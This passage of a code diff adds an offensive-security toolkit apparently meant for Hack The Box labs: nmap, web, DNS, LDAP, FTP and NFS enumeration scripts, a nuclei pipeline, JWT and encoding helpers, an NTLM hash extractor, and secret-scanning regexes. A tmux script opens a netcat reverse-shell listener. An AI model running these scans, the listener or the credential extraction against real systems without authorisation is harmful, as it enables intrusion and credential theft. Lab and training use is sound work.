## Web
- URLs:
- Findings:
## Creds / Keys
-
## Exploitation Plan
-
## Post-Exploitation
- Proofs:
- Loot:
## Artifacts
- Scans directory contains `.nmap`, `.gnmap`, `.xml`, and tool outputs.
MD
# In-place replace placeholders (BSD/GNU sed compatible handling)
if sed --version >/dev/null 2>&1; then
sed -i -e "s/TARGET_PLACEHOLDER/$target/g" -e "s/DATE_PLACEHOLDER/$(date +%F)/g" "$notes"
else
sed -i '' -e "s/TARGET_PLACEHOLDER/$target/g" -e "s/DATE_PLACEHOLDER/$(date +%F)/g" "$notes"
fi
echo "[+] Created $notes"

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
file=${1:-}
[[ -z "$file" || ! -f "$file" ]] && { echo "Usage: $(basename "$0") <.gnmap|.nmap>" >&2; exit 1; }
if [[ "$file" == *.gnmap ]]; then
ports=$(grep -oE "[0-9]+/open" "$file" | cut -d/ -f1 | sort -un | paste -sd, -)
else
ports=$(grep -oE "^[0-9]+/(tcp|udp) +open" "$file" | cut -d/ -f1 | sort -un | paste -sd, -)
fi
echo "$ports"

bin/automation/proxy_toggle.sh Executable file
@@ -0,0 +1,15 @@
#!/usr/bin/env bash
# NOTE: run this sourced (`. proxy_toggle.sh on`) so the exports persist;
# when executed as a child process they vanish as soon as the script exits.
set -euo pipefail
cmd=${1:-}
url=${2:-http://127.0.0.1:8080}
case "$cmd" in
on)
export HTTP_PROXY="$url" HTTPS_PROXY="$url" http_proxy="$url" https_proxy="$url"
echo "[+] Proxy ON => $url";;
off)
unset HTTP_PROXY HTTPS_PROXY http_proxy https_proxy
echo "[+] Proxy OFF";;
*) echo "Usage: $(basename "$0") on|off [http://host:port]" >&2; exit 1;;
esac

@@ -0,0 +1,34 @@
#!/usr/bin/env python3
import sys,re
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <file1.gnmap> [file2.gnmap ...]", file=sys.stderr)
sys.exit(1)
ports_by_host = {}
services_by_host = {}
for path in sys.argv[1:]:
try:
with open(path, 'r', errors='ignore') as f:
for line in f:
if 'Ports:' not in line: continue
m = re.search(r'^Host: ([^\s]+)', line)
if not m: continue
host = m.group(1)
ports = re.findall(r'(\d+)/open/(tcp|udp)/[^/]*/([^/,]*)', line)
for port, proto, service in ports:
ports_by_host.setdefault(host, set()).add(f"{port}/{proto}")
if service:
services_by_host.setdefault(host, set()).add(f"{service}:{port}/{proto}")
except IOError:
print(f"[!] Could not read {path}", file=sys.stderr)
for host in sorted(ports_by_host):
portlist = ','.join(sorted(ports_by_host[host], key=lambda x: (x.split('/')[1], int(x.split('/')[0]))))
print(f"{host}: {portlist}")
if host in services_by_host:
print(" services:")
for s in sorted(services_by_host[host]):
print(f" - {s}")
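A .gnmap Ports entry lists fields in the order port/state/proto/owner/service/…, so the field order matters when writing the extraction pattern. A quick check against a synthetic line (host and services invented):

```python
import re

# Synthetic greppable-nmap line; fields are port/state/proto/owner/service/...
line = "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///"
matches = re.findall(r'(\d+)/open/(tcp|udp)/[^/]*/([^/,]*)', line)
# matches: [('22', 'tcp', 'ssh'), ('80', 'tcp', 'http')]
```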

bin/automation/resume_all.py Executable file
@@ -0,0 +1,31 @@
#!/usr/bin/env python3
import os, json, glob, subprocess
root = os.environ.get('HTB_ROOT', os.getcwd())
targets_dir = os.path.join(root, 'targets')
def load(path):
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return None
manifests = glob.glob(os.path.join(targets_dir, '*', 'manifest.json'))
for m in manifests:
target = os.path.basename(os.path.dirname(m))
data = load(m) or {}
fp = data.get('tasks', {}).get('full_pipeline', {})
status = fp.get('status')
arg = fp.get('meta', {}).get('input')
if status == 'ok':
print(f"[=] {target}: full_pipeline already ok")
continue
if not arg:
print(f"[!] {target}: no input stored in manifest; skipping")
continue
env = os.environ.copy()
env['TARGET'] = target
print(f"[>] Resuming {target} with agent full {arg}")
subprocess.call(["bin/ai/agent_orchestrator.py","full",arg], env=env)

bin/automation/tech_actions.py Executable file
@@ -0,0 +1,94 @@
#!/usr/bin/env python3
import os, sys, json
HELP = """Usage: tech_actions.py <target> [--run]
Reads targets/<target>/manifest.json, looks at httpx_summary techs, and prints suggested next-step commands.
With --run, executes the suggestions sequentially (best-effort).
"""
def load_manifest(root, target):
path=os.path.join(root,'targets',target,'manifest.json')
try:
with open(path,'r') as f:
return json.load(f)
except Exception:
return {}
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
target=sys.argv[1]
run=('--run' in sys.argv)
root=os.environ.get('HTB_ROOT', os.getcwd())
outdir=os.environ.get('OUTDIR', os.path.join(root,'targets',target,'scans'))
data=load_manifest(root, target)
tasks=(data.get('tasks') or {})
httpx_meta=(tasks.get('httpx') or {}).get('meta') or {}
nuclei_meta=(tasks.get('nuclei') or {}).get('meta') or {}
summary_path=httpx_meta.get('httpx_summary')
if not summary_path or not os.path.isfile(summary_path):
print(f"[!] No httpx_summary found for {target}", file=sys.stderr); sys.exit(2)
summary=json.load(open(summary_path))
tech=summary.get('tech') or {}
if not tech:
print(f"[!] No technologies found in summary", file=sys.stderr); sys.exit(3)
def suggest_for(name):
m={
'wordpress': [f"bin/web/httpx_tech_route.py {httpx_meta.get('urls_file','urls.txt')} --tech wordpress --severity medium,high,critical --wpscan --wpscan-limit 5"],
'drupal': ["bin/web/droopescan_quick.sh URL"],
'joomla': ["bin/web/joomscan_quick.sh URL"],
'jenkins': ["bin/web/jenkins_quick.sh URL"],
'sonarqube': ["bin/web/sonarqube_quick.sh URL"],
'magento': ["bin/web/magento_quick.sh URL"],
'jira': ["bin/web/jira_quick.sh URL"],
'confluence': ["bin/web/confluence_quick.sh URL"],
'gitlab': ["bin/web/httpx_tech_route.py URLS --tech gitlab"],
'grafana': ["bin/web/httpx_tech_route.py URLS --tech grafana"],
'kibana': ["bin/web/httpx_tech_route.py URLS --tech kibana"],
'exchange': ["bin/web/httpx_tech_route.py URLS --tech exchange"],
'sharepoint': ["bin/web/httpx_tech_route.py URLS --tech sharepoint"],
}
return m.get(name, [f"bin/web/httpx_tech_route.py URLS --tech {name}"])
print(f"[+] Target: {target}")
urls_file=httpx_meta.get('urls_file','')
top=sorted(tech.items(), key=lambda x: x[1], reverse=True)
for name,count in top[:8]:
print(f"\n# {name} ({count})")
for cmd in suggest_for(name):
c=cmd.replace('URLS', urls_file).replace('URL', '<url>')
print(c)
if run and ' <url>' not in c:
os.system(c)
# Findings-based suggestions (safe-only)
nj=nuclei_meta.get('nuclei_json')
if nj and os.path.isfile(nj):
sev_order={'critical':0,'high':1,'medium':2,'low':3}
tags_index={}
with open(nj,'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line)
sev=(o.get('info') or {}).get('severity','').lower()
if sev not in ('critical','high'): continue
tags=(o.get('info') or {}).get('tags','')
for t in (tags.split(',') if isinstance(tags,str) else []):
t=t.strip().lower()
if not t: continue
tags_index.setdefault(t,0); tags_index[t]+=1
except Exception:
pass
if tags_index:
print("\n# Findings-based next steps (high/critical)")
for t,cnt in sorted(tags_index.items(), key=lambda x: -x[1])[:10]:
if t in ('wordpress','wp'): print(f"bin/web/httpx_tech_route.py {urls_file} --tech wordpress --wpscan --wpscan-limit 5")
elif t in ('jenkins',): print("bin/web/jenkins_quick.sh <url>")
elif t in ('confluence',): print("bin/web/confluence_quick.sh <url>")
elif t in ('jira',): print("bin/web/jira_quick.sh <url>")
elif t in ('drupal',): print("bin/web/droopescan_quick.sh <url>")
elif t in ('joomla',): print("bin/web/joomscan_quick.sh <url>")
else:
print(f"bin/web/httpx_tech_route.py {urls_file} --tech {t}")

bin/automation/tmux_init.sh Executable file
@@ -0,0 +1,17 @@
#!/usr/bin/env bash
set -euo pipefail
session=${1:-htb}
if tmux has-session -t "$session" 2>/dev/null; then
echo "[=] tmux session '$session' exists. Attach with: tmux attach -t $session"
exit 0
fi
tmux new-session -d -s "$session" -n scans
tmux split-window -h -t "$session":0
tmux send-keys -t "$session":0.0 'cd ${HTB_ROOT:-$PWD} && echo scans && ls scans || true' C-m
tmux send-keys -t "$session":0.1 'rlwrap nc -lvnp 4444' C-m
tmux new-window -t "$session":1 -n notes
tmux send-keys -t "$session":1 'notesinit && ${EDITOR:-vim} targets/${TARGET}/notes.md' C-m
tmux new-window -t "$session":2 -n server
tmux send-keys -t "$session":2 'cd www 2>/dev/null || true; http_serve.sh 8000' C-m
echo "[+] tmux session '$session' created. Attach: tmux attach -t $session"

bin/automation/web_recon.sh Executable file
@@ -0,0 +1,61 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <target> [--url]
target: IP/host (probes common web ports) or full URL with --url
Runs headers/tech detect, backup hunter, shallow dirb, and optional screenshots.
USAGE
exit 1
}
target=${1:-}
[[ -z "$target" ]] && usage
mode=url
if [[ ${2:-} != "--url" && "$target" != http* ]]; then mode=host; fi
urls=()
if [[ $mode == host ]]; then
ports=(80 81 88 443 3000 5000 7001 7002 8000 8008 8080 8081 8088 8443 8888 9000)
for p in "${ports[@]}"; do
for scheme in http https; do
code=$(curl -sk -o /dev/null -m 4 -w "%{http_code}" "$scheme://$target:$p/" || true)
if [[ "$code" != "000" ]]; then
urls+=("$scheme://$target:$p/")
break
fi
done
done
else
urls+=("$target")
fi
[[ ${#urls[@]} -eq 0 ]] && { echo "[!] No web service detected" >&2; exit 0; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
log="$outdir/web_recon_${ts}.log"
for u in "${urls[@]}"; do
echo "[+] Recon: $u" | tee -a "$log"
http_headers.sh "$u" | tee -a "$log" || true
tech_detect.sh "$u" | tee -a "$log" || true
backup_hunter.sh "$u" | tee -a "$log" || true
# shallow dir fuzz with smaller wordlist if present
wl=${WORDLIST:-/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt}
if [[ -f "$wl" ]]; then
bin/web/dirbuster.sh "$u" "$wl" php,txt,conf | tee -a "$log" || true
else
bin/web/dirbuster.sh "$u" | tee -a "$log" || true
fi
done
if command -v gowitness >/dev/null 2>&1; then
echo "[+] Taking screenshots with gowitness" | tee -a "$log"
printf "%s\n" "${urls[@]}" | gowitness file -f - -P "$outdir/gowitness_${ts}" 2>&1 | tee -a "$log"
fi
echo "[+] Web recon complete. Log: $log" | tee -a "$log"

@@ -0,0 +1,41 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <hosts.txt>
hosts.txt: list of domains/IPs (one per line). Probes web with httpx, screenshots with gowitness (if present), runs nuclei.
USAGE
exit 1
}
list=${1:-}
[[ -z "$list" || ! -f "$list" ]] && usage
if ! command -v httpx >/dev/null 2>&1; then echo "[!] httpx required" >&2; exit 2; fi
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
alive="$outdir/httpx_${ts}.txt"
urls="$outdir/urls_${ts}.txt"
nucout="$outdir/nuclei_${ts}.txt"
echo "[+] Probing with httpx"
httpx -silent -l "$list" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -asn -ip -hash -server | tee "$alive"
cut -d ' ' -f1 "$alive" | sed 's/\x1b\[[0-9;]*m//g' | sort -u > "$urls"
echo "[+] Alive URLs: $(wc -l < "$urls") saved to $urls"
if command -v gowitness >/dev/null 2>&1; then
echo "[+] Screenshots with gowitness"
gowitness file -f "$urls" -P "$outdir/gowitness_${ts}" >/dev/null 2>&1 || true
fi
if command -v nuclei >/dev/null 2>&1; then
echo "[+] Running nuclei (tags: cves,exposures,misconfig)"
nuclei -l "$urls" -tags cves,exposures,misconfig -severity low,medium,high,critical -o "$nucout" -silent || true
echo "[+] Nuclei output: $nucout"
fi
echo "[+] Wide web recon complete. Outputs: $alive, $urls, $nucout"

bin/crypto/encoders.py Executable file
@@ -0,0 +1,51 @@
#!/usr/bin/env python3
import sys, base64, urllib.parse
def usage():
print("Usage: encoders.py <cmd> [args]\n"
" b64e <data> base64 encode\n"
" b64d <data> base64 decode\n"
" urle <data> url encode\n"
" urld <data> url decode\n"
" hex <data> hex encode\n"
" unhex <hex> hex decode\n"
" xor <hex> <hex> xor two equal-length hex strings\n"
"  rot <n> <text>     Caesar shift by n (n may be negative)\n"
, file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 3:
usage()
cmd = sys.argv[1]
if cmd == 'b64e':
print(base64.b64encode(sys.argv[2].encode()).decode())
elif cmd == 'b64d':
print(base64.b64decode(sys.argv[2]).decode(errors='ignore'))
elif cmd == 'urle':
print(urllib.parse.quote(sys.argv[2]))
elif cmd == 'urld':
print(urllib.parse.unquote(sys.argv[2]))
elif cmd == 'hex':
print(sys.argv[2].encode().hex())
elif cmd == 'unhex':
print(bytes.fromhex(sys.argv[2]).decode(errors='ignore'))
elif cmd == 'xor' and len(sys.argv) >= 4:
a = bytes.fromhex(sys.argv[2]); b = bytes.fromhex(sys.argv[3])
if len(a) != len(b):
print('Lengths differ', file=sys.stderr); sys.exit(2)
print(bytes(x^y for x,y in zip(a,b)).hex())
elif cmd == 'rot' and len(sys.argv) >= 4:
n = int(sys.argv[2]) % 26
out=''
for ch in sys.argv[3]:
if 'a' <= ch <= 'z':
out += chr((ord(ch)-97+n)%26+97)
elif 'A' <= ch <= 'Z':
out += chr((ord(ch)-65+n)%26+65)
else:
out += ch
print(out)
else:
usage()
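The xor command reduces to a byte-wise XOR over two equal-length buffers. A standalone check (the inputs are the well-known cryptopals fixed-XOR vectors, not toolkit data):

```python
# Byte-wise XOR of two equal-length hex strings, as encoders.py's 'xor' does
a = bytes.fromhex('1c0111001f010100061a024b53535009181c')
b = bytes.fromhex('686974207468652062756c6c277320657965')
out = bytes(x ^ y for x, y in zip(a, b)).hex()
# out == '746865206b696420646f6e277420706c6179'  ("the kid don't play")
```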

bin/crypto/jwt_show.py Executable file
@@ -0,0 +1,29 @@
#!/usr/bin/env python3
import sys, json, base64
def b64url_decode(s):
s = s.encode() if isinstance(s, str) else s
s += b'=' * (-len(s) % 4)
return base64.urlsafe_b64decode(s)
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <jwt>", file=sys.stderr); sys.exit(1)
parts = sys.argv[1].split('.')
if len(parts) < 2:
print('Invalid JWT', file=sys.stderr); sys.exit(2)
try:
header = json.loads(b64url_decode(parts[0]))
payload = json.loads(b64url_decode(parts[1]))
except Exception as e:
print(f'Decode error: {e}', file=sys.stderr); sys.exit(3)
print('Header:')
print(json.dumps(header, indent=2))
print('\nPayload:')
print(json.dumps(payload, indent=2))
if len(parts) > 2:
print('\nSignature (base64url):')
print(parts[2])
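The padding trick (append '=' until the length is a multiple of 4) is what makes base64url JWT segments decodable. For a minimal standard header segment:

```python
import base64, json

def b64url_decode(s):
    # Re-pad to a multiple of 4 before decoding, as jwt_show.py does
    return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4))

header = json.loads(b64url_decode('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9'))
# header == {'alg': 'HS256', 'typ': 'JWT'}
```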

bin/dns/gobuster_dns.sh Executable file
@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
threads=${3:-50}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain> [wordlist] [threads] (requires gobuster)" >&2; exit 1; }
command -v gobuster >/dev/null 2>&1 || { echo "[!] gobuster not found" >&2; exit 2; }
exec gobuster dns -d "$domain" -w "$wordlist" -t "$threads" -i

bin/dns/subenum.sh Executable file
@@ -0,0 +1,28 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
out="$outdir/subs_${domain}_${ts}.txt"
if command -v subfinder >/dev/null 2>&1; then
echo "[+] subfinder -d $domain"
subfinder -silent -d "$domain" | tee "$out"
elif command -v amass >/dev/null 2>&1; then
echo "[+] amass enum -passive -d $domain"
amass enum -passive -d "$domain" | tee "$out"
else
echo "[!] subfinder/amass not found; trying minimal brute with wordlist"
wl=${WORDLIST:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
while read -r sub; do
host="$sub.$domain"
dig +short "$host" | head -n1 | grep -qE '.' && echo "$host"
done < "$wl" | tee "$out"
fi
echo "[+] Results saved to $out"

bin/dns/zone_transfer.sh Executable file
@@ -0,0 +1,16 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
ns=${2:-}
[[ -z "$domain" ]] && { echo "Usage: $(basename "$0") <domain> [ns-server]" >&2; exit 1; }
if [[ -n "$ns" ]]; then
dig axfr "$domain" @"$ns"
else
for s in $(dig ns "$domain" +short); do
echo "[+] Trying NS: $s"
dig axfr "$domain" @"$s" || true
done
fi

bin/ftp_enum.sh Executable file
@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_ftp_${ts}"
echo "[+] nmap ftp scripts"
nmap -Pn -p21 --script ftp-anon,ftp-banner,ftp-syst -oN "$base.nmap" "$ip" || true
echo "[+] Testing anonymous login"
{
echo "user anonymous"; echo "pass anonymous@"; echo "pwd"; echo "ls -la"; echo "quit"
} | ftp -inv "$ip" 2>&1 | tee "$base.anon.txt" || true
echo "[+] Saved to $base.*"

@@ -0,0 +1,25 @@
#!/usr/bin/env python3
import sys, re
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <secretsdump.out> [outfile]", file=sys.stderr)
sys.exit(1)
path = sys.argv[1]
out = sys.argv[2] if len(sys.argv) > 2 else None
ntlm = []
with open(path, 'r', errors='ignore') as f:
for line in f:
# user:rid:lmhash:nthash::: (hashcat mode 1000)
if re.match(r'^\S+:[0-9]+:[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}:::', line):
ntlm.append(line.strip())
if out:
with open(out, 'w') as w:
w.write('\n'.join(ntlm)+'\n')
else:
print('\n'.join(ntlm))
print(f"[+] Extracted {len(ntlm)} NTLM lines", file=sys.stderr)
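The SAM-line filter above can be sanity-checked against a synthetic secretsdump line; the constants below are the well-known empty LM hash and empty-password NT hash, not real loot:

```python
import re

# Matches secretsdump.py SAM lines: user:rid:LM:NT::: (hashcat -m 1000 input)
pat = re.compile(r'^\S+:[0-9]+:[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}:::')
line = ('Administrator:500:aad3b435b51404eeaad3b435b51404ee:'
        '31d6cfe0d16ae931b73c59d7e0c089c0:::')
matched = bool(pat.match(line))
```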

bin/hashes/john_pfx.sh Executable file
@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
file=${1:-}
[[ -z "$file" ]] && { echo "Usage: $(basename "$0") <file.pfx>" >&2; exit 1; }
if command -v pfx2john.py >/dev/null 2>&1; then
pfx2john.py "$file"
elif [[ -x /usr/share/john/pfx2john.py ]]; then
/usr/share/john/pfx2john.py "$file"
else
echo "[!] pfx2john.py not found. Install john-jumbo."
exit 2
fi

bin/ldap_enum.sh Executable file
@@ -0,0 +1,38 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
echo "Usage: $(basename "$0") <ip> [user] [pass]" >&2
echo "- Tries to auto-detect base DN, then dumps common trees." >&2
exit 1
}
ip=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$ip" ]] && usage
bind_args=(-x)
if [[ -n "$user" ]]; then
bind_args=(-x -D "$user" -w "$pass")
fi
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_ldap_${ts}"
echo "[+] Query namingContexts"
BASES=$(ldapsearch -H "ldap://$ip" "${bind_args[@]}" -s base -b "" namingContexts 2>/dev/null | awk '/^namingContexts:/{print $2}')
if [[ -z "$BASES" ]]; then
echo "[!] Could not determine base DNs. Try manual -b."
exit 1
fi
echo "$BASES" | tee "$base.bases.txt"
for b in $BASES; do
echo "[+] Dumping base: $b" | tee -a "$base.dump.txt"
ldapsearch -H "ldap://$ip" "${bind_args[@]}" -b "$b" '(objectClass=*)' 2>/dev/null | tee -a "$base.dump.txt"
done
echo "[+] Saved to $base.*"

bin/misc/cyclic.py Executable file

@@ -0,0 +1,37 @@
#!/usr/bin/env python3
import sys

def create(length):
    pattern = ''
    for A in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        for a in 'abcdefghijklmnopqrstuvwxyz':
            for n in '0123456789':
                if len(pattern) >= length:
                    return pattern[:length]
                pattern += A + a + n
    return pattern[:length]

def offset(sub):
    pat = create(10000)
    if sub.startswith('0x'):
        # Little-endian address: decode the hex bytes first, then reverse byte order.
        sub = bytes.fromhex(sub[2:])[::-1].decode('latin1', 'ignore')
    idx = pat.find(sub)
    return idx if idx != -1 else None

def usage():
    print("Usage:\n cyclic.py create <len>\n cyclic.py offset <needle>")
    sys.exit(1)

if len(sys.argv) < 3:
    usage()
cmd = sys.argv[1]
if cmd == 'create':
    print(create(int(sys.argv[2])))
elif cmd == 'offset':
    off = offset(sys.argv[2])
    print(off if off is not None else 'Not found')
else:
    usage()
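The offset lookup above maps a crash address back into the pattern; a minimal standalone sketch of the little-endian decode step (the address value is made up to land at a known offset):

```python
# Mirrors the cyclic pattern generator to show how a crash address maps
# back to an offset. The crash address below is illustrative.
def create(length):
    pattern = ''
    for A in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        for a in 'abcdefghijklmnopqrstuvwxyz':
            for n in '0123456789':
                if len(pattern) >= length:
                    return pattern[:length]
                pattern += A + a + n
    return pattern[:length]

pat = create(40)                       # "Aa0Aa1Aa2Aa3..."
crash_eip = 0x41336141                 # little-endian bytes of "Aa3A"
needle = crash_eip.to_bytes(4, 'little').decode('latin1')
print(pat.find(needle))                # → 9
```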

bin/misc/extract_urls.py Executable file

@@ -0,0 +1,16 @@
#!/usr/bin/env python3
import sys, re

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} <file> [file2 ...]", file=sys.stderr); sys.exit(1)
pat = re.compile(r'(https?://[\w\-\.:%#@\?\/=\+&]+)')
seen = set()
for p in sys.argv[1:]:
    try:
        with open(p, 'r', errors='ignore') as f:
            for line in f:
                for m in pat.findall(line):
                    if m not in seen:
                        seen.add(m); print(m)
    except Exception as e:
        print(f"[!] {p}: {e}", file=sys.stderr)
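The URL regex can be exercised standalone; the sample text is illustrative:

```python
import re

# Same pattern as extract_urls.py: http(s) URLs up to the first unmatched character.
pat = re.compile(r'(https?://[\w\-\.:%#@\?\/=\+&]+)')
text = 'see http://10.10.10.5:8080/login and https://example.com/a?b=1 for details'
print(pat.findall(text))  # both URLs, trimmed at the surrounding spaces
```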

bin/misc/port_forward.sh Executable file

@@ -0,0 +1,40 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage:
Local forward (access remote service locally):
$(basename "$0") -L <lport>:<rhost>:<rport> <user>@<ssh_host>
Remote forward (expose local service to remote):
$(basename "$0") -R <rport>:<lhost>:<lport> <user>@<ssh_host>
Dynamic SOCKS proxy:
$(basename "$0") -D <lport> <user>@<ssh_host>
USAGE
exit 1
}
[[ $# -lt 2 ]] && usage
flag=$1; spec=$2; host=${3:-}
case "$flag" in
-L)
[[ -z "$host" ]] && usage
echo "[+] ssh -N -L $spec $host"
exec ssh -N -L "$spec" "$host"
;;
-R)
[[ -z "$host" ]] && usage
echo "[+] ssh -N -R $spec $host"
exec ssh -N -R "$spec" "$host"
;;
-D)
lport=$spec
host=${3:-}
[[ -z "$host" ]] && usage
echo "[+] ssh -N -D $lport $host"
exec ssh -N -D "$lport" "$host"
;;
*) usage;;
esac

bin/misc/scan_secrets.sh Executable file

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
dir=${1:-.}
[[ ! -d "$dir" ]] && { echo "Usage: $(basename "$0") <dir>" >&2; exit 1; }
patterns=(
'AWS_ACCESS_KEY_ID|AKIA[0-9A-Z]{16}'
'AWS_SECRET_ACCESS_KEY|(?i)aws(.{0,20})?(secret|access).{0,20}?[0-9A-Za-z/+]{40}'
'secret_key|private_key|BEGIN RSA PRIVATE KEY|BEGIN OPENSSH PRIVATE KEY'
'(?i)password\s*[:=]'
'(?i)api(_?key|token)\s*[:=]'
)
for p in "${patterns[@]}"; do
echo "[+] Pattern: $p"
rg -n --hidden -S -g '!node_modules' -g '!.git' -e "$p" "$dir" || true
done

bin/nfs_enum.sh Executable file

@@ -0,0 +1,20 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
[[ -z "$ip" ]] && { echo "Usage: $(basename "$0") <ip>" >&2; exit 1; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${ip//\//_}_nfs_${ts}"
echo "[+] rpcinfo -p $ip"
rpcinfo -p "$ip" | tee "$base.rpcinfo.txt" || true
echo "[+] showmount -e $ip"
showmount -e "$ip" | tee "$base.exports.txt" || true
echo "[+] If there are exports, try: mount -t nfs $ip:/path /mnt -o vers=3"
echo "[+] Saved outputs under $base.*"

bin/nmap_full.sh Executable file

@@ -0,0 +1,35 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <target> [--rate 5000]" >&2; exit 1; }
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
rate=5000
extra=()
while [[ $# -gt 0 ]]; do
case "$1" in
--rate) rate=${2:-5000}; shift 2;;
*) extra+=("$1"); shift;;
esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_full_${ts}"
echo "[+] Phase1: All TCP ports scan (-p-) with min rate $rate"
nmap -Pn -p- --min-rate "$rate" -T4 -oA "$base.phase1" "$target" "${extra[@]}"
open_ports=$(grep -oE "[0-9]+/open" "$base.phase1.gnmap" | cut -d/ -f1 | sort -un | paste -sd, -)
if [[ -z "$open_ports" ]]; then
echo "[!] No open TCP ports found."
exit 0
fi
echo "[+] Phase2: Version + scripts on ports: $open_ports"
nmap -Pn -sC -sV -p "$open_ports" -oA "$base.phase2" "$target"
echo "[+] Results saved under base: $base.phase1.* and $base.phase2.*"
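The phase-1 → phase-2 handoff parses open ports out of the grepable output; a standalone sketch against a sample .gnmap line:

```python
import re

# A .gnmap host line looks roughly like this (sample values):
line = ("Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh///, "
        "80/open/tcp//http///, 443/closed/tcp//https///")
# Ports appear as "<port>/open"; closed/filtered entries are skipped.
ports = sorted({int(m) for m in re.findall(r'(\d+)/open', line)})
print(','.join(map(str, ports)))  # → 22,80
```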

bin/nmap_quick.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
usage() {
echo "Usage: $(basename "$0") <target> [extra_nmap_args...]" >&2
echo "- Fast TCP scan with default scripts and service detection." >&2
exit 1
}
target=${1:-${TARGET:-}}
[[ -z "${target}" ]] && usage
shift || true
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_quick_${ts}"
echo "[+] Running nmap quick against $target"
nmap -Pn -T4 -sC -sV -oA "$base" "$target" "$@"
echo "[+] Results saved to: ${base}.nmap | .gnmap | .xml"

bin/nmap_udp.sh Executable file

@@ -0,0 +1,25 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <target> [--top 200]" >&2; exit 1; }
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
top=200
while [[ $# -gt 0 ]]; do
case "$1" in
--top) top=${2:-200}; shift 2;;
*) break;;
esac
done
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/${target//\//_}_udp_top${top}_${ts}"
echo "[+] UDP scan top $top against $target"
nmap -Pn -sU --top-ports "$top" -T4 -oA "$base" "$target"
echo "[+] Results saved to: ${base}.*"

bin/passwords/hash_id.sh Executable file

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
if command -v hashid >/dev/null 2>&1; then
exec hashid "$@"
fi
hash=${1:-}
[[ -z "$hash" ]] && { echo "Usage: $(basename "$0") <hash>" >&2; exit 1; }
len=${#hash}
case "$hash" in
*:*:*:*) echo "[guess] NTLM format (user:rid:lmhash:nthash:::). Hashcat 1000."; exit 0;;
esac
if [[ $len -eq 32 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] MD5 or NT (NTLM)"; exit 0; fi
if [[ $len -eq 40 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] SHA1"; exit 0; fi
if [[ $len -eq 64 && "$hash" =~ ^[A-Fa-f0-9]+$ ]]; then echo "[guess] SHA256"; exit 0; fi
echo "[guess] Unknown format"

bin/passwords/merge_dedupe.sh Executable file

@@ -0,0 +1,5 @@
#!/usr/bin/env bash
set -euo pipefail
[[ $# -lt 1 ]] && { echo "Usage: $(basename "$0") <file1> [file2 ...]" >&2; exit 1; }
